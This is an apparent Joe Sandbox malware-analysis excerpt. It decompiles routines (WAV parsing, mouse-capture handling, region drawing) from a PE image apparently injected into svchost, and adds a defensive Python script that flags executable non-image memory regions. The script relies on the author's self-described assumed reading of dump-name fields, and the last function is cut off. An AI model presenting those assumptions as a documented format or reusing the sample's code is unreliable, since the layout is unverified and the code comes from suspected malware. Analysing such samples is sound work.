    				intOrPtr* _t108;
    				signed int _t110;
    				signed int _t111;
    				intOrPtr _t112;
    				void* _t114;
    				intOrPtr _t116;
    				void* _t122;
    				intOrPtr _t123;
    				void* _t124;
    				signed int _t136;
    				signed int _t137;
    				intOrPtr* _t152;
    				intOrPtr _t160;
    				signed int _t161;
    				intOrPtr _t162;
    				intOrPtr _t179;
    				intOrPtr _t189;
    				intOrPtr _t191;
    				signed int _t195;
    				void* _t196;
    				intOrPtr _t202;
    				intOrPtr _t203;
    				void* _t204;
    				void* _t206;
    				intOrPtr* _t207;
    				signed int _t208;
    				intOrPtr _t209;
    				signed int* _t211;
    				signed int* _t212;
    				signed int* _t213;
    				signed int* _t217;
    				signed int* _t218;
    				signed int* _t219;
    
    				if(_a8 < 0x24) {
    					L15:
    					return 0;
    				} else {
    					_t204 = _a4;
    					asm("repne scasb");
    					_t128 =  !(__ecx | 0xffffffff) - 1;
    					_t67 = E00470280(_t204, "RIFF",  !(__ecx | 0xffffffff) - 1);
    					_t211 =  &(( &_v8)[3]);
    					if(_t67 != 0) {
    						goto L15;
    					} else {
    						_v4 =  *((intOrPtr*)(_t204 + 4));
    						asm("repne scasb");
    						_t70 = E00470280(_t204 + 8, "WAVE",  !(_t128 | 0xffffffff) - 1);
    						_t212 =  &(_t211[3]);
    						if(_t70 != 0) {
    							goto L15;
    						} else {
    							_t122 = 0;
    							_t206 = 0;
    							_t208 = 0;
    							_t195 = _a4 + 0xc;
    							_v8 = _t195;
    							do {
    								_a4 =  *((intOrPtr*)(_t195 + 4));
    								_t71 = E00470280(_t195, "fmt ", 4);
    								_t212 =  &(_t212[3]);
    								if(_t71 != 0) {
    									_t72 = E00470280(_t195, "data", 4);
    									_t212 =  &(_t212[3]);
    									if(_t72 != 0) {
    										goto L9;
    									} else {
    										_t208 = _a4;
    										_t206 = _t195 + 8;
    										if(_t122 != 0) {
    											L11:
    											if(_t206 == 0 || _t208 <= 0) {
    												goto L15;
    											} else {
    												_t75 = E00483003(0x4c);
    												_a8 = _t75;
    												 *(_t75 + 8) = _t208;
    												_t77 = E00471697(_a8[2]);
    												_t213 =  &(_t212[2]);
    												 *_a8 = _t77;
    												_t78 = _a8;
    												_t196 =  *_a8;
    												if(_t196 != 0) {
    													_t136 = _t208;
    													_t137 = _t136 >> 2;
    													memcpy(_t196, _t206, _t137 << 2);
    													memcpy(_t206 + _t137 + _t137, _t206, _t136 & 0x00000003);
    													_a8[0x12] = _a12;
    													_a8[7] = 0;
    													_a8[3] = E0043CAE0(0x3c00, 0x14);
    													_a8[0xb] = CreateEventA(0, 1, 0, 0);
    													_a8[0xa] = CreateSemaphoreA(0, 0x14, 0x14, 0);
    													_a8[5] = 0;
    													_a8[4] = 0x14;
    													 *0x492298( &(_a8[0xc]));
    													E0043CB50(_a4 + 4, _t122, _a4, E0043D320);
    													_t217 =  &(_t213[0xc]);
    													_t91 = CreateThread(0, 0, E0043D0D0, _a4, 4, _a4 + 0x24);
    													 *(_v0 + 0x20) = _t91;
    													 *0x49224c(0x4c9e70);
    													_t93 =  *0x4c9e90; // 0x0
    													_t179 =  *0x4c9e94; // 0x0
    													_t207 = _t93;
    													if(_t179 - _t93 >> 2 >= 1) {
    														if(_t93 - _t207 >> 2 >= 1) {
    															E0043D390(_t93 + 0xfffffffc, _t93, _t93);
    															_t96 =  *0x4c9e90; // 0x0
    															_t152 = _t96;
    															_t97 = _t96 + 0xfffffffc;
    															if(_t207 != _t97) {
    																do {
    																	_t97 = _t97 - 4;
    																	_t152 = _t152 - 4;
    																	 *_t152 =  *_t97;
    																} while (_t97 != _t207);
    															}
    															_t58 = _t207 + 4; // 0x4
    															_t98 = _t58;
    															while(_t207 != _t98) {
    																 *_t207 = _v4;
    																_t207 = _t207 + 4;
    															}
    														} else {
    															_t55 = _t207 + 4; // 0x4
    															E0043D390(_t207, _t93, _t55);
    															_t106 =  *0x4c9e90; // 0x0
    															E0043D3C0(_t106, 1 - (_t106 - _t207 >> 2),  &_v16);
    															_t160 =  *0x4c9e90; // 0x0
    															_t108 = _t207;
    															if(_t207 != _t160) {
    																do {
    																	 *_t108 = _v4;
    																	_t108 = _t108 + 4;
    																} while (_t108 != _t160);
    															}
    														}
    														 *0x4c9e90 =  *0x4c9e90 + 4;
    													} else {
    														_t189 =  *0x4c9e8c; // 0x0
    														if(_t189 == 0 || _t93 - _t189 >> 2 <= 1) {
    															_t161 = 1;
    														} else {
    															_t161 = _t93 - _t189 >> 2;
    														}
    														if(_t189 != 0) {
    															_t110 = _t93 - _t189 >> 2;
    														} else {
    															_t110 = 0;
    														}
    														_t111 = _t110 + _t161;
    														_v8 = _t111;
    														if(_t111 < 0) {
    															_t111 = 0;
    														}
    														_t112 = E00483003(_t111 * 4);
    														_t202 =  *0x4c9e8c; // 0x0
    														_t218 =  &(_t217[1]);
    														_t209 = _t112;
    														_t123 = _t209;
    														while(_t202 != _t207) {
    															E0043D3F0(_t123, _t202);
    															_t202 = _t202 + 4;
    															_t218 =  &(_t218[2]);
    															_t123 = _t123 + 4;
    														}
    														_t114 = E0043D3F0(_t123,  &_v4);
    														_t203 =  *0x4c9e90; // 0x0
    														_t219 =  &(_t218[2]);
    														_t124 = _t123 + 4;
    														while(_t207 != _t203) {
    															_t114 = E0043D3F0(_t124, _t207);
    															_t207 = _t207 + 4;
    															_t219 =  &(_t219[2]);
    															_t124 = _t124 + 4;
    														}
    														_t162 =  *0x4c9e90; // 0x0
    														_t191 =  *0x4c9e8c; // 0x0
    														E0043D380(_t114, _t191, _t162);
    														_t116 =  *0x4c9e8c; // 0x0
    														E0048302C(_t116);
    														 *0x4c9e94 = _t209 + _v16 * 4;
    														_t53 = E0043D360(0x4c9e88) * 4; // 0x4
    														 *0x4c9e8c = _t209;
    														 *0x4c9e90 = _t209 + _t53 + 4;
    													}
    													 *0x492250(0x4c9e70);
    													ResumeThread( *(_v8 + 0x20));
    													ReleaseSemaphore( *(_v8 + 0x28), 0x14, 0);
    													return 1;
    												} else {
    													E0048302C(_t78);
    													goto L15;
    												}
    											}
    										} else {
    											goto L9;
    										}
    									}
    								} else {
    									_t122 = _t195 + 8;
    									if(_t206 != 0) {
    										break;
    									} else {
    										goto L9;
    									}
    								}
    								goto L41;
    								L9:
    								_t195 = _t195 + _a4 + 8;
    							} while (_t195 - _v8 < _v4);
    							if(_t122 == 0) {
    								goto L15;
    							} else {
    								goto L11;
    							}
    						}
    					}
    				}
    				L41:
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0043CE5B
    • CreateSemaphoreA.KERNEL32(00000000,00000014,00000014,00000000), ref: 0043CE70
    • RtlInitializeCriticalSection.NTDLL(?), ref: 0043CE9B
    • CreateThread.KERNEL32(00000000,00000000,0043D0D0,?,00000004,?), ref: 0043CED0
    • RtlEnterCriticalSection.NTDLL(004C9E70), ref: 0043CEE2
    • RtlLeaveCriticalSection.NTDLL(004C9E70), ref: 0043D095
    • ResumeThread.KERNEL32(?), ref: 0043D0A3
    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 0043D0B5
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateCriticalSection$SemaphoreThread$EnterEventInitializeLeaveReleaseResume
    • String ID: RIFF$WAVE$data$fmt
    • API String ID: 1802393137-4212202414
    • Opcode ID: 65fb761d8f6907855dcab970824bd963702d5118980fd65427f618626713fa15
    • Instruction ID: d1a9704af2a1d390afc1684d89d132c3744fb1c7e52f83c10cba873e9d92e0a5
    • Opcode Fuzzy Hash: 65fb761d8f6907855dcab970824bd963702d5118980fd65427f618626713fa15
    • Instruction Fuzzy Hash: 5AB10375A00300ABD714DF28DC85F6B77A5FB98708F144A2EF94AA7380D679ED01CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00432660(intOrPtr* __ecx) {
    				signed int _v8;
    				RECT* _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				struct tagMSG _v60;
    				char _v64;
    				char _v68;
    				char _v72;
    				char _v76;
    				char _v80;
    				void* _v84;
    				char _v88;
    				char _v92;
    				char _v96;
    				char _v100;
    				char _v104;
    				char _v108;
    				intOrPtr _v112;
    				char _v120;
    				intOrPtr _v124;
    				intOrPtr _v128;
    				void* __ebp;
    				struct HWND__* _t87;
    				intOrPtr _t103;
    				void* _t115;
    				int _t119;
    				void* _t131;
    				void* _t134;
    				void* _t142;
    				void* _t145;
    				char _t158;
    				signed int _t159;
    				signed int _t160;
    				intOrPtr* _t213;
    				struct tagPOINT* _t228;
    				intOrPtr* _t230;
    				void* _t232;
    				intOrPtr _t234;
    				signed int _t235;
    				signed int _t236;
    				intOrPtr _t237;
    				void* _t238;
    
    				_push(0xffffffff);
    				_push(E0048FAE8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t237;
    				_t238 = _t237 - 0x4c;
    				_push(_t232);
    				_t230 = __ecx;
    				_t87 = GetCapture();
    				_t240 = _t87;
    				if(_t87 != 0) {
    					L21:
    					 *[fs:0x0] = _v12;
    					return _t87;
    				}
    				_v88 = E0042D860(_t230);
    				E00484C84(_t232, SetCapture( *(_t230 + 0x1c)));
    				_push(_t230);
    				E00489C16( &_v64, _t240);
    				_push( *((intOrPtr*)(_t230 + 0x5c)));
    				_push( *((intOrPtr*)(_t230 + 0x58)));
    				_v12 = 0;
    				E00445E70( &_v68);
    				_t238 = _t238 + 0xc;
    				_t213 = E00432AE0(_t230, _t232,  &_v92);
    				_v88 =  *_t213;
    				_v84 =  *((intOrPtr*)(_t213 + 4));
    				E00489B44( &_v72,  &_v88);
    				E004896D5( &_v76, 1);
    				E0048964A( &_v80, 7);
    				E004895EE( &_v84, 1);
    				_push(0xffffff);
    				_push(0);
    				_push(2);
    				E00489F2B( &_v96);
    				_v60.time = 1;
    				_t103 = E00489512( &_v100,  &_v108);
    				_t234 = _v32;
    				_t158 = _v36;
    				_t228 = _v60.pt;
    				_push(_t234);
    				_v128 = _t103;
    				E00432A60( &_v104,  &_v104, _t228,  &_v120, _t158);
    				if(E00484C84(_t234, GetCapture()) != _t230) {
    					L19:
    					_push(_t234);
    					E00432A60(_t107,  &_v80, _t228,  &_v96, _t158);
    					ReleaseCapture();
    					E00489512( &_v100, _v124);
    					_v112 = 0x496df0;
    					_v60.lParam = 4;
    					L20:
    					E00489F15( &_v92);
    					_v28 = 0xffffffff;
    					_t87 = E00489C88( &_v84, _t246);
    					goto L21;
    				}
    				while(GetMessageA( &_v60, 0, 0, 0) != 0) {
    					_t107 = _v60.message;
    					if(_t107 != 0x100) {
    						__eflags = _t107 - 0x204;
    						if(_t107 == 0x204) {
    							goto L19;
    						}
    						L7:
    						if(_v60.hwnd ==  *(_t230 + 0x1c)) {
    							_t115 = _t107 - 0x200;
    							__eflags = _t115;
    							if(_t115 == 0) {
    								L12:
    								_push(_t234);
    								E00432A60( &_v80,  &_v80, _t228,  &_v96, _t158);
    								__eflags = _t158 - 0xffffffff;
    								if(_t158 == 0xffffffff) {
    									__eflags = _t234 - 0xffffffff;
    									if(_t234 != 0xffffffff) {
    										 *(_t228 + 4) = 0;
    										 *_t228 = _v60.time;
    									}
    								} else {
    									 *_t228 = 0;
    									 *(_t228 + 4) = _v60.pt;
    								}
    								_t119 = ScreenToClient( *(_t230 + 0x1c), _t228);
    								__eflags = _v60.hwnd - 0x202;
    								if(_v60.hwnd == 0x202) {
    									ReleaseCapture();
    									E00489512( &_v84, _v108);
    									_push( *((intOrPtr*)(_t230 + 0x5c)));
    									_push( *((intOrPtr*)(_t230 + 0x58)));
    									E00445E70( &_v88);
    									_t238 = _t238 + 0xc;
    									E0042D280( &_v16,  &_v88);
    									_v36 = 2;
    									DPtoLP(_v84, _t228, 1);
    									__eflags = _t158 - 0xffffffff;
    									if(_t158 == 0xffffffff) {
    										__eflags = _t234 - 0xffffffff;
    										if(_t234 != 0xffffffff) {
    											_t159 = _v8;
    											__eflags = _t159 -  *_t228;
    											if(_t159 !=  *_t228) {
    												_v12 = E0042D390(_t230, _t234, _t234);
    												_t160 =  ~_t159;
    												_push(_t160);
    												_push(E0042D550(_t230, _t234,  *_t228));
    												_t131 = E0042D550(_t230, _t234, _v20);
    												__eflags = _t131 - 0x14;
    												if(_t131 >= 0x14) {
    													_push(_t160);
    													_push(E0042D550(_t230, _t234,  *_t228));
    													_t134 = E0042D550(_t230, _t234, _v24);
    												} else {
    													_t134 = 0x14;
    												}
    												__eflags = _t134 - _v24;
    												if(__eflags != 0) {
    													E0042AE90(_v128, __eflags, _t234, 1, _t134);
    													InvalidateRect( *(_t230 + 0x1c), 0, 0);
    													 *((intOrPtr*)( *_t230 + 0xc8))(_t234);
    												}
    											}
    										}
    									} else {
    										_t235 = _v8;
    										__eflags = _t235 -  *(_t228 + 4);
    										if(_t235 !=  *(_t228 + 4)) {
    											_v12 = E0042D2B0(_t230, _t235, _t158);
    											_t236 =  ~_t235;
    											_push(_t236);
    											_push(E0042D680(_t230, _t236,  *(_t228 + 4)));
    											_t142 = E0042D680(_t230, _t236, _v20);
    											__eflags = _t142 - 0x14;
    											if(_t142 >= 0x14) {
    												_push(_t236);
    												_push(E0042D680(_t230, _t236,  *(_t228 + 4)));
    												_t145 = E0042D680(_t230, _t236, _v24);
    											} else {
    												_t145 = 0x14;
    											}
    											__eflags = _t145 - _v24;
    											if(__eflags != 0) {
    												E0042AE40(_v128, __eflags, _t158, 1, _t145);
    												InvalidateRect( *(_t230 + 0x1c), 0, 0);
    												 *((intOrPtr*)( *_t230 + 0xc4))(_t158);
    											}
    										}
    									}
    									E0042D2A0( &_v12);
    									_v92 = 0x496df0;
    									_v28 = 3;
    									goto L20;
    								}
    								_push(_t234);
    								E00432A60(_t119,  &_v84, _t228,  &_v100, _t158);
    								goto L18;
    							}
    							__eflags = _t115 == 2;
    							if(_t115 == 2) {
    								goto L12;
    							} else {
    								DispatchMessageA( &_v60);
    								goto L18;
    							}
    						} else {
    							DispatchMessageA( &_v60);
    							L18:
    							_t107 = E00484C84(_t234, GetCapture());
    							_t246 = _t107 - _t230;
    							if(_t107 == _t230) {
    								continue;
    							}
    							goto L19;
    						}
    					}
    					if(_v60.wParam == 0x1b) {
    						goto L19;
    					} else {
    						goto L7;
    					}
    				}
    				_t107 = E0048DABD(_v60.wParam);
    				goto L19;
    			}

    APIs
    • GetCapture.USER32 ref: 0043267E
    • SetCapture.USER32(?,?,?,?,?,?,?,?,?,0048FAE8,000000FF,00431EBD,?,?,?,?), ref: 0043269B
      • Part of subcall function 00489C16: __EH_prolog.LIBCMT ref: 00489C1B
      • Part of subcall function 00489C16: GetDC.USER32(?), ref: 00489C44
      • Part of subcall function 00445E70: GetWindowExtEx.GDI32(?,?), ref: 00445E93
      • Part of subcall function 00489B44: GetWindowExtEx.GDI32(?,?), ref: 00489B55
      • Part of subcall function 00489B44: GetViewportExtEx.GDI32(?,?), ref: 00489B62
      • Part of subcall function 00489B44: MulDiv.KERNEL32(?,00000000,00000000), ref: 00489B87
      • Part of subcall function 00489B44: MulDiv.KERNEL32(?,00000000,00000000), ref: 00489BA2
      • Part of subcall function 004896D5: SetMapMode.GDI32(?,?), ref: 004896EE
      • Part of subcall function 004896D5: SetMapMode.GDI32(?,?), ref: 004896FC
      • Part of subcall function 0048964A: SetROP2.GDI32(?,?), ref: 00489663
      • Part of subcall function 0048964A: SetROP2.GDI32(?,?), ref: 00489671
      • Part of subcall function 004895EE: SetBkMode.GDI32(?,?), ref: 00489607
      • Part of subcall function 004895EE: SetBkMode.GDI32(?,?), ref: 00489615
      • Part of subcall function 00489F2B: __EH_prolog.LIBCMT ref: 00489F30
      • Part of subcall function 00489F2B: CreatePen.GDI32(?,?,?), ref: 00489F53
      • Part of subcall function 00489512: SelectObject.GDI32(?,00000000), ref: 00489534
      • Part of subcall function 00489512: SelectObject.GDI32(?,?), ref: 0048954A
    • GetCapture.USER32 ref: 00432761
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00432780
    • DispatchMessageA.USER32(?), ref: 004327C1
    • DispatchMessageA.USER32(?), ref: 004327DD
    • ScreenToClient.USER32(?,?), ref: 00432824
    • GetCapture.USER32 ref: 0043284C
    • ReleaseCapture.USER32 ref: 00432874
    • ReleaseCapture.USER32 ref: 004328D0
    • DPtoLP.GDI32 ref: 00432914
    • InvalidateRect.USER32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,?,?), ref: 0043299D
    • InvalidateRect.USER32(?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00432A2B
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Capture$Mode$Message$DispatchH_prologInvalidateObjectRectReleaseSelectWindow$ClientCreateScreenViewport
    • String ID:
    • API String ID: 453157188-0
    • Opcode ID: c647619642beb075de6a929e1d159935a21ceeab0a0d16b741b37f98fc397a8f
    • Instruction ID: f98e449be5a0ca3160c5b44798e99e4a65ea8e0eafc53551b843bf2c5a087847
    • Opcode Fuzzy Hash: c647619642beb075de6a929e1d159935a21ceeab0a0d16b741b37f98fc397a8f
    • Instruction Fuzzy Hash: 29B1A671204700ABD724EB65CD85E6FB7E9BF88704F104A1EF25683291DB78ED05CB6A
    Uniqueness

    Uniqueness Score: -1.00%
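
The twelve dump files listed under Memory Dump Source (the same set is repeated for every function on this page) are the regions of the PE image at 0x400000 that the sandbox captured from svchost, analysis process 7. The routines decompiled on this page are ordinary GUI drawing and dialog code; what makes them interesting is where they run. As an added example, not part of the Joe Sandbox report, the following Python parses those file names and applies the check a memory-forensics tool applies to an injected image: executable memory that is not backed by an image section. The field layout is my reading of the names on this page (field 4 base address, field 5 PAGE_* protection, field 7 MEM_* type, all hex), not a documented Joe Sandbox format; the one MEM_IMAGE control entry is constructed.

```python
"""Triage the "Memory Dump Source" regions listed above for the PE image at
0x400000 inside svchost (analysis process 7).

Added example for this report, not Joe Sandbox code.  Field meanings are
assumptions inferred from the values on this page: field 1 = analysis process
number, field 4 = region base address, field 5 = Win32 page protection (the
page shows 0x02/0x04/0x20/0x40, exactly the PAGE_* values), field 7 = region
type (0x20000 == MEM_PRIVATE).  Fields 2, 3, 6 and 8 are not decoded.
"""
from collections import namedtuple

# winnt.h
PAGE_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80
PAGE_WRITABLE_ANY = 0x04 | 0x08 | 0x40 | 0x80
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

Region = namedtuple("Region", "process base protect region_type name")

def parse_dump_name(name):
    """'proc.f2.f3.base.protect.f6.type.f8.sdmp' -> Region (fields read as hex)."""
    fields = name[:-5].split(".") if name.endswith(".sdmp") else name.split(".")
    if len(fields) != 8:
        raise ValueError("unexpected dump name: " + name)
    return Region(int(fields[0], 16), int(fields[3], 16), int(fields[4], 16),
                  int(fields[6], 16), name)

def injected_code_indicators(region):
    """malfind-style rule: executable memory that is not MEM_IMAGE has no
    on-disk module behind it, the footprint of a PE written into a process.
    RWX is reported separately; a normally loaded image never needs it."""
    reasons = []
    if region.protect & PAGE_EXECUTE_ANY:
        if region.region_type != MEM_IMAGE:
            reasons.append("executable but not MEM_IMAGE")
        if region.protect & PAGE_WRITABLE_ANY:
            reasons.append("RWX")
    return reasons

def triage(names):
    """Return (base, protection, type, indicators) per dump, sorted by base."""
    rows = []
    for r in sorted(map(parse_dump_name, names), key=lambda r: r.base):
        rows.append((r.base, PAGE_NAMES.get(r.protect, hex(r.protect)),
                     TYPE_NAMES.get(r.region_type, hex(r.region_type)),
                     injected_code_indicators(r)))
    return rows

def flagged_bases(names):
    return [base for base, _, _, reasons in triage(names) if reasons]

def image_extent(names):
    """Lowest and highest dumped base: how much of the mapped PE was captured."""
    bases = [parse_dump_name(n).base for n in names]
    return min(bases), max(bases)

# The twelve dump names from the "Memory Dump Source" block above (process 7).
PAGE_DUMPS = """
00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp
00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
""".split()

# Constructed control, not from the report: what a normally loaded DLL's .text
# would look like under the same assumed naming (MEM_IMAGE, execute/read).
CONTROL_DUMP = "00000007.00000002.000000000.0000000077000000.00000020.00000400.01000000.00000000.sdmp"

if __name__ == "__main__":
    for base, prot, typ, reasons in triage(PAGE_DUMPS + [CONTROL_DUMP]):
        print(f"{base:#010x} {prot:24} {typ:12} {', '.join(reasons) or 'ok'}")
```

Every executable region of this image is flagged: the .text-like region at 0x401000 because it is execute/read without an image backing, and the nine regions from 0x4A9000 upward because they are RWX on top of that. The header at 0x400000 and the read-only region at 0x492000 are not executable and pass, as does the constructed MEM_IMAGE control.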

    C-Code - Quality: 95%
    			E00424F50(long __ecx, void* __fp0) {
    				void* _t190;
    				int _t191;
    				signed int _t192;
    				int _t195;
    				int _t199;
    				signed int _t206;
    				struct HRGN__* _t226;
    				int _t227;
    				struct tagRECT _t228;
    				long _t229;
    				struct tagPOINT _t230;
    				struct tagRECT _t239;
    				signed int _t240;
    				struct tagPOINT _t241;
    				intOrPtr* _t262;
    				intOrPtr* _t264;
    				struct tagRECT* _t265;
    				struct tagRECT _t271;
    				signed int _t272;
    				intOrPtr _t274;
    				int* _t280;
    				struct tagRECT* _t281;
    				signed int _t288;
    				intOrPtr* _t319;
    				intOrPtr* _t320;
    				struct tagRECT _t324;
    				void* _t358;
    				signed int _t359;
    				void* _t360;
    				struct tagRECT* _t361;
    				int _t368;
    				signed int _t370;
    				intOrPtr _t371;
    				int _t374;
    				signed int _t375;
    				void* _t380;
    				intOrPtr _t381;
    				signed int _t383;
    				struct tagRECT* _t385;
    				signed int _t386;
    				intOrPtr* _t387;
    				intOrPtr _t388;
    				void* _t389;
    				void* _t401;
    
    				_t401 = __fp0;
    				_push(0xffffffff);
    				_push(E0048EF84);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t388;
    				_t389 = _t388 - 0x88;
    				_t383 =  *(_t389 + 0xb8);
    				 *(_t389 + 0x30) = __ecx;
    				if(_t383 < 2) {
    					L19:
    					_t190 = 0;
    					L20:
    					 *[fs:0x0] =  *((intOrPtr*)(_t389 + 0x98));
    					return _t190;
    				}
    				_t280 =  *(_t389 + 0xb8);
    				if( *_t280 <= 0) {
    					goto L19;
    				}
    				_t191 = _t280[1];
    				if(_t191 <= 0) {
    					goto L19;
    				}
    				_t374 =  *_t280;
    				_t368 = _t191;
    				if( *((intOrPtr*)(_t389 + 0xb0)) != 1) {
    					_t281 =  *(_t389 + 0xac);
    					_t385 = _t281;
    					_t324 =  *_t385;
    					 *(_t389 + 0x20) = _t324;
    					_t271 = _t385->top;
    					 *(_t389 + 0x24) = _t271;
    					_t192 = _t385->right;
    					 *(_t389 + 0x28) = _t192;
    					_t386 = _t385->bottom;
    					asm("cdq");
    					 *(_t389 + 0x2c) = _t386;
    					_t195 = _t192 - _t324 - _t324 >> 1;
    					if(_t374 > _t195) {
    						_t374 = _t195;
    					}
    					asm("cdq");
    					_t199 = _t386 - _t271 - _t324 >> 1;
    					if(_t368 > _t199) {
    						_t368 = _t199;
    					}
    					 *(_t389 + 0x34) = _t281->left;
    					 *(_t389 + 0x38) = _t281->top;
    					 *(_t389 + 0x3c) = _t281->right;
    					 *(_t389 + 0x40) = _t281->bottom;
    					InflateRect(_t389 + 0x38,  ~_t374,  ~_t368);
    					_t383 =  *(_t389 + 0xc0);
    				} else {
    					_t265 =  *(_t389 + 0xac);
    					_t361 = _t265;
    					 *(_t389 + 0x38) =  *_t361;
    					 *(_t389 + 0x3c) = _t361->top;
    					 *(_t389 + 0x40) = _t361->right;
    					 *(_t389 + 0x44) = _t361->bottom;
    					 *(_t389 + 0x24) =  *_t265;
    					 *(_t389 + 0x28) = _t265->top;
    					 *(_t389 + 0x2c) = _t265->right;
    					 *(_t389 + 0x30) = _t265->bottom;
    					InflateRect(_t389 + 0x24, _t374, _t368);
    				}
    				if(_t374 <= 0 || _t368 <= 0) {
    					goto L19;
    				} else {
    					_t272 =  *(_t389 + 0xc4);
    					asm("sbb edx, edx");
    					_t206 = ( ~((0x10624dd3 * _t272 >> 0x00000020 >> 0x00000006) + (0x10624dd3 * _t272 >> 0x00000020 >> 0x00000006 >> 0x0000001f) & 0x00000001) & 0xfffffffc) + 2;
    					 *(_t389 + 0x94) = _t206;
    					if((_t272 & 0x00000001) == 0) {
    						 *(_t389 + 0x14) = 0xffffffff;
    						_t206 =  ~_t206;
    					} else {
    						 *(_t389 + 0x14) = 1;
    					}
    					 *(_t389 + 0x54) = _t206;
    					 *(_t389 + 0x10) = _t383;
    					_t370 = (0x51eb851f * _t272 >> 0x00000020 >> 0x00000005) + (0x51eb851f * _t272 >> 0x00000020 >> 0x00000005 >> 0x0000001f) & 0x00000001;
    					if(_t370 != 0) {
    						 *(_t389 + 0x10) = _t383 + _t383 - 1;
    					}
    					E0040B5D0(_t389 + 0x58);
    					 *(_t389 + 0xa0) = 0;
    					_t375 =  *(_t389 + 0x10) * 4;
    					_t387 = E0040B5F0(_t389 + 0x58, _t375);
    					if(_t387 != 0) {
    						_t288 =  *(_t389 + 0xc0);
    						if(((0x66666667 * _t272 >> 0x00000020 >> 0x00000002) + (0x66666667 * _t272 >> 0x00000020 >> 0x00000002 >> 0x0000001f) & 0x00000001) == 0) {
    							E0040BF70(_t387,  *((intOrPtr*)(_t389 + 0xbc)), _t288 * 4);
    							_t389 = _t389 + 0xc;
    							L27:
    							if(_t370 == 0) {
    								L31:
    								_t273 =  *((intOrPtr*)(_t389 + 0xc8));
    								_t376 =  *((intOrPtr*)(_t389 + 0xb4));
    								_t371 =  *((intOrPtr*)(_t389 + 0xa8));
    								 *(_t389 + 0x48) =  *(_t389 + 0x24);
    								 *(_t389 + 0x54) =  *(_t389 + 0x28);
    								 *(_t389 + 0x54) =  *(_t389 + 0x20);
